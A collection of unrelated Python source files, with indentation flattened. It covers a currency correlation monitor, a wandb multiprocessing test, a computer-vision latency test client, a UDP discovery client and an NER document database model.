s2_prices_subset = s2_prices[(s2_prices['time'] >= date_from_subset)]
# Calculate the coefficient
coefficient = \
self.calculate_coefficient(symbol1_prices=s1_prices_subset, symbol2_prices=s2_prices_subset,
min_prices=params['min_prices'],
max_set_size_diff_pct=params['max_set_size_diff_pct'],
overlap_pct=params['overlap_pct'], max_p_value=params['max_p_value'])
self.__log.debug(f"Symbol pair {symbol1}:{symbol2} has a coefficient of {coefficient} for last "
f"{params['from']} minutes.")
# Add the coefficient to a dict {timeframe: coefficient}. We will update together for all for
# symbol pair and time
coefficients[params['from']] = coefficient
# Update coefficient data for all coefficients for all timeframes for this run and symbol pair.
self.__update_coefficient_data(symbol1=symbol1, symbol2=symbol2, coefficients=coefficients,
date_to=date_to)
def __update_all_coefficients(self):
"""
Updates the coefficient for all symbol pairs in that meet the min_coefficient threshold. Symbol pairs that meet
the threshold can be accessed through the filtered_coefficient_data property.
"""
# Update latest coefficient for every pair
for index, row in self.filtered_coefficient_data.iterrows():
symbol1 = row['Symbol 1']
symbol2 = row['Symbol 2']
self.__update_coefficients(symbol1=symbol1, symbol2=symbol2)
def __reset_coefficient_data(self):
"""
Clears coefficient data and history.
:return:
"""
# Create dataframes for coefficient data.
coefficient_data_columns = ['Symbol 1', 'Symbol 2', 'Base Coefficient', 'UTC Date From', 'UTC Date To',
'Timeframe', 'Last Calculation', 'Status']
self.coefficient_data = pd.DataFrame(columns=coefficient_data_columns)
# Clear coefficient history
self.clear_coefficient_history()
# Clear price data
self.__price_data = None
def __update_coefficient_data(self, symbol1, symbol2, coefficients, date_to):
"""
Updates the coefficient data with the latest coefficient and adds to coefficient history.
:param symbol1:
:param symbol2:
:param coefficients: Dict of all coefficients calculated for this run and symbol pair. {timeframe: coefficient}
:param date_to: The date from for which the coefficient was calculated
:return:
"""
timezone = pytz.timezone("Etc/UTC")
now = datetime.now(tz=timezone)
# Update data if we have a coefficient and add to history
if coefficients is not None:
# Update the coefficient data table with the Last Calculation time.
self.coefficient_data.loc[(self.coefficient_data['Symbol 1'] == symbol1) &
(self.coefficient_data['Symbol 2'] == symbol2),
'Last Calculation'] = now
# Are we an inverse correlation
inverse = self.get_base_coefficient(symbol1, symbol2) <= self.monitoring_threshold * -1
# Calculate status and update
status = self.__calculate_status(coefficients=coefficients, inverse=inverse)
self.coefficient_data.loc[(self.coefficient_data['Symbol 1'] == symbol1) &
(self.coefficient_data['Symbol 2'] == symbol2),
'Status'] = status
# Update history data
for key in coefficients:
row = pd.DataFrame(columns=self.coefficient_history.columns,
data=[[symbol1, symbol2, coefficients[key], key, date_to]])
self.coefficient_history = self.coefficient_history.append(row)
def __calculate_status(self, coefficients, inverse):
"""
Calculates the status from the supplied set of coefficients
:param coefficients: Dict of timeframes and coefficients {timeframe: coefficient} to calculate status from
:param: Whether we are calculating status based on normal or inverse correlation
:return: status
"""
status = STATUS_NOT_CALCULATED
# Only continue if we have calculated all coefficients, otherwise we will return STATUS_NOT_CALCULATED
if None not in coefficients.values():
# Get the values ordered by timeframe descending
ordered_values = []
for key in sorted(coefficients, reverse=True):
ordered_values.append(coefficients[key])
if self.monitor_inverse and inverse:
# Calculation for inverse calculations
if all(i <= self.divergence_threshold * -1 for i in ordered_values):
status = STATUS_CORRELATED
elif all(i > self.divergence_threshold * -1 for i in ordered_values):
status = STATUS_DIVERGED
elif all(ordered_values[i] <= ordered_values[i+1] for i in range(0, len(ordered_values)-1, 1)):
status = STATUS_CONVERGING
elif all(ordered_values[i] > ordered_values[i+1] for i in range(0, len(ordered_values)-1, 1)):
status = STATUS_DIVERGING
else:
status = STATUS_INCONSISTENT
else:
# Calculation for standard correlations
if all(i >= self.divergence_threshold for i in ordered_values):
status = STATUS_CORRELATED
elif all(i < self.divergence_threshold for i in ordered_values):
status = STATUS_DIVERGED
elif all(ordered_values[i] <= ordered_values[i+1] for i in range(0, len(ordered_values)-1, 1)):
status = STATUS_DIVERGING
elif all(ordered_values[i] > ordered_values[i+1] for i in range(0, len(ordered_values)-1, 1)):
status = STATUS_CONVERGING
else:
status = STATUS_INCONSISTENT
return status
|
06-1-share-child-base.py
|
#!/usr/bin/env python
"""Test parent and child processes sharing a run.
Compare to a run in a single process, base usage of `run.log`"""
import multiprocessing as mp
import wandb
import yea
def process_parent():
run = wandb.init()
assert run == wandb.run
run.config.c1 = 11
run.log({"s1": 11})
return run
def process_child(run):
run.config.c2 = 22
run.log({"s1": 21})
def reference_run():
run = process_parent()
process_child(run)
run.finish()
def share_run():
run = process_parent()
p = mp.Process(target=process_child, kwargs=dict(run=run))
p.start()
p.join()
run.finish()
def main():
wandb.require("service")
reference_run()
share_run()
if __name__ == "__main__":
yea.setup() # Use ":yea:start_method:" to set mp.set_start_method()
main()
|
multi_client.py
|
# Copyright 2020 MobiledgeX, Inc. All rights and licenses reserved.
# MobiledgeX, Inc. 156 2nd Street #408, San Francisco, CA 94105
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Client script that can use multiple communication methods to send images to the
computervision backend and measure latency.
"""
import sys
import os
import platform
import requests
import subprocess
import re
import base64
import socket
import websocket
import ssl
import struct
import json
import time
import logging
import cv2
from threading import Thread
from utils import RunningStats
WEBSOCKET_OPCODE_BINARY = 0x2
PING_INTERVAL = 4
TEST_PASS = False
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(threadName)s - %(levelname)s - %(message)s')
fh = logging.FileHandler('multi_client.log')
fh.setLevel(logging.DEBUG)
fh.setFormatter(formatter)
logger.addHandler(fh)
ch = logging.StreamHandler()
ch.setLevel(logging.INFO)
ch.setFormatter(formatter)
logger.addHandler(ch)
if platform.system() == "Darwin":
PING = "/sbin/ping"
PING_REGEX = r'round-trip min/avg/max/stddev = (.*)/(.*)/(.*)/(.*) ms'
else:
PING = "/bin/ping"
PING_REGEX = r'rtt min/avg/max/mdev = (.*)/(.*)/(.*)/(.*) ms'
class Client:
""" Base Client class """
MULTI_THREADED = False
# Initialize "Grand total" class variables.
stats_latency_full_process = RunningStats()
stats_latency_network_only = RunningStats()
stats_server_processing_time = RunningStats()
def __init__(self, host, port):
# Initialize instance variables.
self.host = host
self.port = port
self.do_server_stats = False
self.show_responses = False
self.stats_latency_full_process = RunningStats()
self.stats_latency_network_only = RunningStats()
self.stats_server_processing_time = RunningStats()
self.media_file_name = None
self.latency_start_time = 0
self.loop_count = 0
self.num_repeat = 0
self.filename_list = []
self.filename_list_index = 0
self.json_params = None
self.base64 = False
self.video = None
self.resize = True
self.resize_long = 240
self.resize_short = 180
self.skip_frames = 1
logger.debug("host:port = %s:%d" %(self.host, self.port))
def start(self):
logger.debug("media file(s) %s" %(self.filename_list))
video_extensions = ('mp4', 'avi', 'mov')
if self.filename_list[0].endswith(video_extensions):
logger.debug("It's a video")
self.media_file_name = self.filename_list[0]
self.video = cv2.VideoCapture(self.media_file_name)
def get_next_image(self):
if self.video is not None:
for x in range(self.skip_frames):
ret, image = self.video.read()
if not ret:
logger.debug("End of video")
return None
vw = image.shape[1]
vh = image.shape[0]
logger.debug("Video size: %dx%d" %(vw, vh))
if self.resize:
if vw > vh:
resize_w = self.resize_long
resize_h = self.resize_short
else:
resize_w = self.resize_short
resize_h = self.resize_long
image = cv2.resize(image, (resize_w, resize_h))
logger.debug("Resized image to: %dx%d" %(resize_w, resize_h))
res, image = cv2.imencode('.JPEG', image)
image = image.tostring()
else:
# If the filename_list array has more than 1, get the next value.
if len(self.filename_list) > 1:
self.filename_list_index += 1
if self.filename_list_index >= len(self.filename_list):
self.filename_list_index = 0
else:
self.filename_list_index = 0
if self.stats_latency_full_process.n >= self.num_repeat:
return None
self.media_file_name = self.filename_list[self.filename_list_index]
f = open(self.media_file_name, "rb")
image = f.read()
logger.debug("Image data (first 32 bytes logged): %s" %image[:32])
return image
def get_server_stats(self):
url = "http://%s:%d%s" %(self.host, self.port, "/server/usage/")
if self.tls:
url = url.replace("http", "https", 1)
logger.info(requests.get(url).content)
def time_open_socket(self):
now = time.time()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
sock.settimeout(2)
result = sock.connect_ex((self.host, self.port))
if result != 0:
logger.error("Could not connect to %s on port %d" %(self.host, self.port))
return
millis = (time.time() - now)*1000
elapsed = "%.3f" %millis
if self.show_responses:
logger.info("%s ms to open socket" %(elapsed))
self.stats_latency_network_only.push(millis)
Client.stats_latency_network_only.push(millis)
def icmp_ping(self):
args=[PING, '-c', '1', '-W', '1', self.host]
p_ping = subprocess.Popen(args,
shell=False,
stdout=subprocess.PIPE)
# save ping stdout
p_ping_out = str(p_ping.communicate()[0])
if (p_ping.wait() == 0):
logger.info(p_ping_out)
# rtt min/avg/max/mdev = 61.994/61.994/61.994/0.000 ms
search = re.search(PING_REGEX, p_ping_out, re.M|re.I)
ping_rtt = float(search.group(2))
if self.show_responses:
logger.info("%s ms ICMP ping" %(ping_rtt))
self.stats_latency_network_only.push(ping_rtt)
Client.stats_latency_network_only.push(ping_rtt)
else:
logger.error("ICMP ping failed")
def process_result(self, result):
global TEST_PASS
try:
decoded_json = json.loads(result)
except Exception as e:
logger.error("Could not decode result. Exception: %s. Result: %s" %(e, result))
TEST_PASS = False
return
if 'success' in decoded_json:
if decoded_json['success'] == "true":
TEST_PASS = True
else:
TEST_PASS = False
if 'latency_start' in decoded_json:
millis = (time.time() - decoded_json['latency_start'])*1000
self.stats_latency_network_only.push(millis)
Client.stats_latency_network_only.push(millis)
else:
millis = (time.time() - self.latency_start_time)*1000
self.stats_latency_full_process.push(millis)
Client.stats_latency_full_process.push(millis)
if 'server_processing_time' in decoded_json:
server_processing_time = decoded_json['server_processing_time']
self.stats_server_processing_time.push(float(server_processing_time))
Client.stats_server_processing_time.push(float(server_processing_time))
if self.show_responses:
elapsed = "%.3f" %millis
logger.info("%s ms to send and receive: %s" %(elapsed, result))
def display_results(self):
if not self.show_responses or not Client.MULTI_THREADED:
return
if self.stats_latency_full_process.n > 0:
logger.info("====> Average Latency Full Process=%.3f ms (stddev=%.3f)" %(self.stats_latency_full_process.mean(), self.stats_latency_full_process.stddev()))
if self.stats_latency_network_only.n > 0:
logger.info("====> Average Latency Network Only=%.3f ms (stddev=%.3f)" %(self.stats_latency_network_only.mean(), self.stats_latency_network_only.stddev()))
if self.stats_server_processing_time.n > 0:
logger.info("====> Average Server Processing Time=%.3f ms (stddev=%.3f)" %(self.stats_server_processing_time.mean(), Client.stats_server_processing_time.stddev()))
class RestClient(Client):
def __init__(self, host, port=8008):
if port is None:
port = 8008
Client.__init__(self, host, port)
def start(self):
Client.start(self)
self.url = "http://%s:%d%s" %(self.host, self.port, self.endpoint)
if self.tls:
self.url = self.url.replace("http", "https", 1)
while True:
image = self.get_next_image()
if image is None:
break
self.latency_start_time = time.time()
if self.base64:
response = self.send_image_json(image)
else:
response = self.send_image(image)
content = response.content
if response.status_code != 200:
logger.error("non-200 response: %d: %s" %(response.status_code, content))
self.num_repeat -= 1
continue
self.process_result(content)
if (self.stats_latency_full_process.n) % PING_INTERVAL == 0:
if self.do_server_stats:
self.get_server_stats()
if self.net_latency_method == "SOCKET":
self.time_open_socket()
else:
self.icmp_ping()
logger.debug("Done")
self.display_results()
def send_image(self, image):
"""
Sends the raw image data with a 'Content-Type' of 'image/jpeg'.
"""
# headers = {'Content-Type': 'image/jpeg', "Mobiledgex-Debug": "true"} # Enable saving debug images
headers = {'Content-Type': 'image/jpeg'}
return requests.post(self.url, data=image, headers=headers, verify=self.tls_verify)
def send_image_json(self, image):
"""
Base64 encodes the image, and sends it as the "image" value
in the JSON paramater set. Content-Type=application/x-www-form-urlencoded
"""
data = {'image': base64.b64encode(image)}
if self.json_params != None:
params = json.loads(self.json_params)
data.update(params)
return requests.post(self.url, data=data)
class PersistentTcpClient(Client):
def __init__(self, host, port=8011):
if port is None:
port = 8011
Client.__init__(self, host, port)
def start(self):
Client.start(self)
if self.endpoint == "/detector/detect/":
op_code = 1
elif self.endpoint == "/recognizer/predict/":
op_code = 2
elif self.endpoint == "/openpose/detect/":
op_code = 3
elif self.endpoint == "/object/detect/":
op_code = 4
else:
logger.error("Unknown endpoint: %s" %self.endpoint)
return
# Open the connection one time, then send the image data multiple times.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
logger.info("host:port = %s:%d" %(self.host, self.port))
sock.connect((self.host, self.port))
logger.debug("repeating %s %d times" %(op_code, self.num_repeat))
while True:
data = self.get_next_image()
if data is None:
break
length = len(data)
logger.debug("data length = %d" %length)
self.latency_start_time = time.time()
sock.sendall(struct.pack('!I', op_code))
sock.sendall(struct.pack('!I', length))
sock.sendall(data)
lengthbuf = sock.recv(4)
length, = struct.unpack('!I', lengthbuf)
result = str(sock.recv(length), "utf-8")
self.process_result(result)
if (self.stats_latency_full_process.n) % PING_INTERVAL == 0:
if self.do_server_stats:
self.get_server_stats()
if self.net_latency_method == "SOCKET":
self.time_open_socket()
else:
self.icmp_ping()
logger.debug("Done")
self.display_results()
def recvall(sock, count):
buf = b''
while count:
newbuf = sock.recv(count)
if not newbuf: return None
buf += newbuf
count -= len(newbuf)
return buf
class WebSocketClient(Client):
def __init__(self, host, port=8008):
if port is None:
port = 8008
Client.__init__(self, host, port)
def start(self):
Client.start(self)
url = "ws://%s:%s/ws%s" %(self.host, self.port, self.endpoint)
if self.tls:
url = url.replace("ws", "wss", 1)
logger.debug("url: %s" %url)
ws = websocket.WebSocketApp(url,
on_message = lambda ws,msg: self.on_message(ws, msg),
on_error = lambda ws,msg: self.on_error(ws, msg),
on_close = lambda ws: self.on_close(ws),
on_open = lambda ws: self.on_open(ws))
# websocket.enableTrace(True)
if self.tls_verify:
ws.run_forever()
else:
ws.run_forever(sslopt={"cert_reqs": ssl.CERT_NONE})
def on_message(self, ws, message):
# As each response is received, process the response, then send the next image.
# logger.info("on_message: %s loop_count: %s", %(message,self.loop_count))
self.process_result(message)
self.loop_count += 1
if self.loop_count % (PING_INTERVAL+1) == 0:
if self.do_server_stats:
self.get_server_stats()
# ignore self.net_latency_method because any other type of
# network activity seems to lock up the websocket.
# Text payload gets echoed back. See how long it takes.
payload = json.dumps({"latency_start": time.time()})
ws.send(payload)
return
image = self.get_next_image()
if image is None:
logger.debug("repeating done")
self.display_results()
ws.close()
return
logger.debug("loop_count: %d media_file_name: %s filename_list_index: %s num_repeat: %s count_latency_full_process: %s" %(self.loop_count, self.media_file_name, self.filename_list_index, self.num_repeat, self.stats_latency_full_process.n))
self.latency_start_time = time.time()
ws.send(image, WEBSOCKET_OPCODE_BINARY)
def on_error(self, ws, error):
logger.info("on_error: %s" %error)
def on_close(self, ws):
logger.info("on_close")
def on_open(self, ws):
# As soon as the websocket is open, send the first image.
image = self.get_next_image()
self.loop_count += 1
self.latency_start_time = time.time()
ws.send(image, WEBSOCKET_OPCODE_BINARY)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--server", required=True, help="Server host name or IP address.")
parser.add_argument("-e", "--endpoint", required=True, choices=["/detector/detect/", "/recognizer/predict/", "/openpose/detect/", "/object/detect/", "/trainer/add/", "/trainer/predict/"], help="Endpoint of web service to call.")
parser.add_argument("-n", "--network-latency", required=False, choices=["PING", "SOCKET"], default="SOCKET", help="Network-only latency test method.")
parser.add_argument("-c", "--connection-method", required=True, choices=["rest", "socket", "websocket"], help="Connection type.")
parser.add_argument("-f", "--filename", required=False, help="Name of image file to send.")
parser.add_argument("-d", "--directory", required=False, help="Directory containing image files to send (*.jpg, *.png).")
parser.add_argument("-r", "--repeat", type=int, default=1, help="Number of times to repeat.")
parser.add_argument("-t", "--threads", type=int, default=1, help="Number of concurrent execution threads.")
parser.add_argument("--skip-frames", type=int, default=1, help="For video, send every Nth frame.")
parser.add_argument("-p", "--port", type=int, help="Port number")
parser.add_argument("-j", "--json-params", required=False, help='Extra parameters to include with image. Ex: {"subject":"Max Door", "owner":"Bruce Armstrong"}')
parser.add_argument("--fullsize", action='store_true', help="Maintain original image size. Default is to shrink the image before sending.")
parser.add_argument("--base64", action='store_true', help="Base64 encode image")
parser.add_argument("--tls", action='store_true', help="Use https connection")
parser.add_argument("--noverify", action='store_true', help="Disable TLS cert verification")
parser.add_argument("--show-responses", action='store_true', help="Show responses.")
parser.add_argument("--server-stats", action='store_true', help="Get server stats every Nth frame.")
args = parser.parse_args()
if args.threads > 1:
Client.MULTI_THREADED = True
for x in range(args.threads):
if args.connection_method == "rest":
client = RestClient(args.server, args.port)
elif args.connection_method == "socket":
client = PersistentTcpClient(args.server, args.port)
elif args.connection_method == "websocket":
client = WebSocketClient(args.server, args.port)
else:
# This should be impossible because the ArgumentParser enforces a valid choice.
logger.error("Unknown connection-method: %s" %args.connection_method)
sys.exit()
if args.base64 and args.connection_method != "rest":
logger.warning("base64 parameter ignored for %s" %args.connection_method)
if args.filename != None and args.directory != None:
logger.error("Can't include both filename and directory arguments")
parser.print_usage()
sys.exit()
if args.filename != None:
client.filename_list.append(args.filename)
elif args.directory != None:
valid_extensions = ('jpg','jpeg', 'png')
files = os.listdir(args.directory)
for file in files:
if file.endswith(valid_extensions):
client.filename_list.append(args.directory+"/"+file)
else:
logger.error("Must include either filename or directory argument")
parser.print_usage()
sys.exit()
client.filename_list_index = -1
client.num_repeat = args.repeat * len(client.filename_list)
client.do_server_stats = args.server_stats
client.show_responses = args.show_responses
client.endpoint = args.endpoint
client.json_params = args.json_params
client.base64 = args.base64
client.net_latency_method = args.network_latency
client.resize = not args.fullsize
client.skip_frames = args.skip_frames
client.tls = args.tls
client.tls_verify = not args.noverify
thread = Thread(target=client.start)
thread.start()
logger.debug("Started %s" %thread)
time.sleep(0.5) # stagger threads
thread.join()
if Client.stats_latency_full_process.n + Client.stats_latency_network_only.n + Client.stats_server_processing_time.n > 0:
header1 = "Grand totals for %s %s %s" %(args.server, args.endpoint, args.connection_method)
header2 = "%d threads repeated %d times on %d files. %d total frames." %(args.threads, args.repeat, len(client.filename_list), Client.stats_latency_full_process.n)
separator = ""
for s in header1: separator += "="
logger.info(separator)
logger.info(header1)
logger.info(header2)
logger.info(separator)
if Client.stats_latency_full_process.n > 0:
logger.info("====> Average Latency Full Process=%.3f ms (stddev=%.3f)" %(Client.stats_latency_full_process.mean(), Client.stats_latency_full_process.stddev()))
if Client.stats_latency_network_only.n > 0:
logger.info("====> Average Latency Network Only=%.3f ms (stddev=%.3f)" %(Client.stats_latency_network_only.mean(), Client.stats_latency_network_only.stddev()))
if Client.stats_server_processing_time.n > 0:
logger.info("====> Average Server Processing Time=%.3f ms (stddev=%.3f)" %(Client.stats_server_processing_time.mean(), Client.stats_server_processing_time.stddev()))
# The following line outputs CSV data that can be imported to a spreadsheet.
#print("%s,%s,%.3f,%.3f" %((args.server, args.filename, file_size, Client.stats_latency_full_process.mean(), Client.stats_latency_network_only.mean())))
logger.info("TEST_PASS=%r" %TEST_PASS)
else:
logger.info("No results")
|
broadcast_client.py
|
import socket
import time
import threading
from threading import Thread
class udpclient():
def __init__(self):
self.AMOUNT_BYTES = 1024
self.BROADCAST_PORT_SEND = 9000
BROADCAST_PORT_RECV = 9001
BROADCAST_LISTEN = ''
self.BROADCAST_SEND = '<broadcast>'
#SOCKET TO RECEIVE MSG
self.bsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.bsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.bsock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
self.bsock.bind((BROADCAST_LISTEN,BROADCAST_PORT_RECV))
self.teste = 0
def loop(self):
t1 = threading.Thread(target=self.send)
t1.start()
while True :
message , address = self.bsock.recvfrom(self.AMOUNT_BYTES)
if message == b'ACK':
self.teste = 1
return address[0]
def send(self):
while self.teste == 0:
self.bsock.sendto(b"DISCOVER", (self.BROADCAST_SEND, self.BROADCAST_PORT_SEND))
time.sleep(5)
|
document_entity.py
|
"""
Name: arXiv Intelligence NER Web Service
Authors: Jonathan CASSAING
Web service specialized in Named Entity Recognition (NER), in Natural Language Processing (NLP)
"""
import json
import sys
from datetime import datetime
from multiprocessing import Process
from pathlib import Path
from sqlalchemy import Column, Integer, String
from web_service.common.base import Base, session_factory
from web_service.common.config import Config
from web_service.services.spacy_ner_service import SpacyNerService
from web_service.services.aws_comprehend_ner_service import AwsComprehendNerService
from .named_entity import NamedEntityRelationshipEnum, NamedEntityScoreEnum, NamedEntityEncoder
class DocumentEntity(Base):
"""Class for representing a generic document entity and his Data Access Object
"""
# Table name in the database
__tablename__ = "document"
# Internal ID is used to store the real ID (in database) after the session close
internal_id = None
# ID primary key in the database
# Nota: this id is wiped after a session.close()
id = Column("id", Integer, primary_key=True)
# Status column in the database
status = Column("status", String(255))
# Uploaded date and time column in the database
uploaded_date = Column("uploaded_date", String(255))
# Author PDF meta data
author = Column("author", String(255))
# Creator PDF meta data
creator = Column("creator", String(255))
# Producer PDF meta data
producer = Column("producer", String(255))
# Subjet PDF meta data
subject = Column("subject", String(255))
# Title PDF meta data
title = Column("title", String(255))
# Pages count PDF meta data
number_of_pages = Column("number_of_pages", Integer)
# Raw informations PDF meta data
raw_info = Column("raw_info", String())
# Content column in the database
content = Column("content", String)
# Named entities extracted in json format
named_entities = Column("named_entities", String())
def __init__(self: object, config: Config):
"""Initialize the object"""
self.config = config
@staticmethod
def _binary_search(named_entities, target_begin_offset):
"""This algorithm is a binary search
It search in the named_entities list,
the named entity which match with target_begin_offset.
The named_entities list must be sorted by begin_offset field
Args:
named_entities (list<NamedEntity>): list where search the offset.
target_begin_offset (int): offset to search in the list.
Returns:
index: the index of the offset searched,
otherwise the nearest index if the offset was not found,
None in case of error.
named_entity: the named_entity matching with the specified offset,
otherwise - returns None.
"""
aaa = 0
bbb = len(named_entities)
if bbb == 0:
# If the list is empty, we leave
return None, None
while bbb > aaa + 1:
mmm = (aaa + bbb) // 2
if named_entities[mmm].begin_offset > target_begin_offset:
bbb = mmm
else:
aaa = mmm
if named_entities[aaa].begin_offset == target_begin_offset:
return aaa, named_entities[aaa]
if named_entities[aaa].begin_offset > target_begin_offset:
nearest_index = aaa
else:
nearest_index = bbb
return nearest_index, None
def _merge(self, named_entities_1, named_entities_2) -> list:
"""Merge distinct the two named_entities_1 and named_entities_2 lists
These two lists must be sorted by begin_offset field
Args:
named_entities_1 (list<NamedEntity>): list to merge.
named_entities_2 (list<NamedEntity>): list to merge.
Returns:
list<NamedEntity>: merged list.
"""
# First, we search the smallest list
if len(named_entities_1) < len(named_entities_2):
smallest_list = named_entities_1
biggest_list = named_entities_2
else:
smallest_list = named_entities_2
biggest_list = named_entities_1
# We merge each element of the smallest list in the biggest list
for named_entity in smallest_list:
# We search the named_entity in the biggest list
index, named_entity_searched = self._binary_search(
biggest_list,
named_entity.begin_offset
)
if index is not None:
# If we have found it and the text match the current named entity
# No need to insert
if named_entity_searched is not None \
and (named_entity_searched.text == named_entity.text):
# But we just keep the aws_score (if exist)
try:
if named_entity.aws_score is not None:
named_entity_searched.aws_score = named_entity.aws_score
except AttributeError:
pass
# Also, we increment the score
if named_entity_searched.score == NamedEntityScoreEnum.LOW:
named_entity_searched.score = NamedEntityScoreEnum.MEDIUM
elif named_entity_searched.score == NamedEntityScoreEnum.MEDIUM:
named_entity_searched.score = NamedEntityScoreEnum.HIGH
# Else, we have no found the named entity
else:
# So, we insert it as new element in the biggest list
biggest_list.insert(index, named_entity)
return biggest_list
def insert(
self,
uploaded_date: str = None,
author: str = None,
creator: str = None,
producer: str = None,
subject: str = None,
title: str = None,
number_of_pages: int = None,
raw_info: str = None,
content: str = None,
named_entities: str = None):
"""Insert a new object to the database"""
session = session_factory()
self.status = "PENDING"
if uploaded_date is not None:
self.uploaded_date = str(uploaded_date)
if author is not None:
self.author = str(author)
if creator is not None:
self.creator = str(creator)
if producer is not None:
self.producer = str(producer)
if subject is not None:
self.subject = str(subject)
if title is not None:
self.title = str(title)
if number_of_pages is not None:
self.number_of_pages = number_of_pages
if raw_info is not None:
self.raw_info = str(raw_info)
if content is not None:
self.content = str(content)
if named_entities is not None:
self.named_entities = str(named_entities)
session.add(self)
session.commit()
# We save the ID cause it will wiped after the session.close()
self.internal_id = self.id
session.close()
return self.internal_id
def update(
self,
object_id: int,
status: str = "SUCCESS",
uploaded_date: str = None,
author: str = None,
creator: str = None,
producer: str = None,
subject: str = None,
title: str = None,
number_of_pages: int = None,
raw_info: str = None,
content: str = None,
named_entities: str = None):
"""Update an object in the database"""
session = session_factory()
pdf_entity = session.query(DocumentEntity).get(object_id)
pdf_entity.status = status
if uploaded_date is not None:
pdf_entity.uploaded_date = str(uploaded_date)
if author is not None:
pdf_entity.author = str(author)
if creator is not None:
pdf_entity.creator = str(creator)
if producer is not None:
pdf_entity.producer = str(producer)
if subject is not None:
pdf_entity.subject = str(subject)
if title is not None:
pdf_entity.title = str(title)
if number_of_pages is not None:
pdf_entity.number_of_pages = number_of_pages
if raw_info is not None:
pdf_entity.raw_info = str(raw_info)
if content is not None:
pdf_entity.content = str(content)
if named_entities is not None:
pdf_entity.named_entities = str(named_entities)
session.commit()
# We save the ID cause it will wiped after the session.close()
self.internal_id = self.id
session.close()
return self.internal_id
def _async_ner(self, filename: Path, object_id: int):
"""Private method to extract named entities then update a PDF object in the database
You must use insert() without parameter before,
to get the id of your futur line in the database.
Args:
filename (str): filename of the target file
object_id (int): id of the database line to update
Returns:
int: ID of the persisted object in the database.
"""
try:
# Extracting data end metadata of the document
document = self.extract_document(filename)
except IOError:
print(
"Error: the file", filename.absolute, "does not appear to exist",
file=sys.stderr
)
# Set the ERROR in database
self.update(
object_id,
"ERROR",
datetime.today().strftime("%Y-%m-%d-%H-%M-%S.%f")
)
return self.internal_id
try:
# We extract the named entities
named_entities = self.extract_named_entities(document.content)
# We convert named entities to json
json_named_entities = json.dumps(named_entities, cls=NamedEntityEncoder)
except ValueError as err:
print("Error when extracting named entities:", err)
# Set the ERROR in database
self.update(
object_id,
"ERROR",
datetime.today().strftime("%Y-%m-%d-%H-%M-%S.%f"),
document.author,
document.creator,
document.producer,
document.subject,
document.title,
document.number_of_pages,
document.raw_info,
document.content
)
return self.internal_id
# Saving content to the database
self.update(
object_id,
"SUCCESS",
datetime.today().strftime("%Y-%m-%d-%H-%M-%S.%f"),
document.author,
document.creator,
document.producer,
document.subject,
document.title,
document.number_of_pages,
document.raw_info,
document.content,
json_named_entities
)
return self.internal_id
def extract_named_entities(self, text: str):
"""This method extracted the named entities from the text"""
ner_services = []
ner_methods = self.config.get_ner_methods()
if "aws-comprehend" in ner_methods:
ner_services.append(AwsComprehendNerService(
self.config.get_aws_region(),
self.config.get_max_char_per_aws_request()))
if "nltk" in ner_methods:
print("NLTK NER method not supported yet")
if "spacy" in ner_methods:
ner_services.append(SpacyNerService())
# Now, we must split the text in two parts (before and after "References" key word)
references_word = "References"
splited_text = text.rsplit(references_word, 1)
named_entities = []
# For each NER service
for ner_service in ner_services:
# We get the named entities list
named_entities_quoted = ner_service.extract(
splited_text[0], NamedEntityRelationshipEnum.QUOTED
)
# Because the 2nd part of the text (i.e. splited_text[1]), start from 0,
# The NER object will locate the named entities from 0, so we have to set an offset,
# To take account of the first splited text (before references key word)
try:
named_entities_referenced = ner_service.extract(
splited_text[1], NamedEntityRelationshipEnum.REFERENCED,
len(splited_text[0]) + len(references_word)
)
except IndexError:
# If except, the "References" key word has not been found
# So, we empty the named_entities_referenced list
named_entities_referenced = []
# We merge the named entities list with the previous list
named_entities = self._merge(
named_entities, named_entities_quoted+named_entities_referenced
)
return named_entities
def extract_document(self, filename: Path):
"""Method for extracting data and metadata from a document
You must overwrite extract_document() by your own code
if you would extract data and metadata from a specific document.
See PdfEntity for example.
Returns:
document (DocumentEntity): You must fill the following attributes of the document;
author, creator, producer, subject, title, number_of_pages, info, content."""
with open(filename, "r", encoding='utf-8') as file:
# Extracting the text (content)
content = file.read()
document = DocumentEntity(self.config)
document.content = content
return document
def start_ner(self, filename: Path):
"""Start the recognition of named entities
Public method to extract then persist a document in the database
First, this method ask an ID for the futur line in the database, then,
this method create a process for extracting data and
persisting the object in the database.
This method returns the ID of the object in the database
which will be inserted when the process will finish.
This method calls _async_ner() method and execute it in a separated process.
You must overwrite extract_document() by your own code
if you would extract data and metadata from a specific document.
See PdfEntity for example.
Args:
filename (str): filename of the target file
Returns:
int: ID of the persisted object in the database,
otherwise - returns None if the file's type is not supported.
"""
# We persist an empty object just to get the ID of the line in the database
object_id = self.insert()
# We launch the process
process = Process(target=self._async_ner, args=(filename, object_id))
process.start()
# Returning the id in the database
return object_id
class DocumentEncoder(json.JSONEncoder):
"""Class for converting full object to JSON string"""
def default(self, o):
if isinstance(o, DocumentEntity):
doc_id = o.id
if None is doc_id:
# If None, the object was created after a INSERT query,
# so, the internal_id is the table id
doc_id = o.internal_id
json_named_entities = None
if o.named_entities is not None:
json_named_entities = json.loads(o.named_entities)
return {
"id": doc_id,
"status": o.status,
"uploaded_date": o.uploaded_date,
"author": o.author,
"creator": o.creator,
"producer": o.producer,
"subject": o.subject,
"title": o.title,
"number_of_pages": o.number_of_pages,
"raw_info": o.raw_info,
"content": o.content,
"named_entities": json_named_entities
}
# Base class will raise the TypeError.
return super().default(o)
|
synth.py
|
import wave
import threading
from pathlib import Path
from importlib import import_module
from functools import lru_cache, partial
from contextlib import contextmanager
import numpy as np
import soundcard as sc
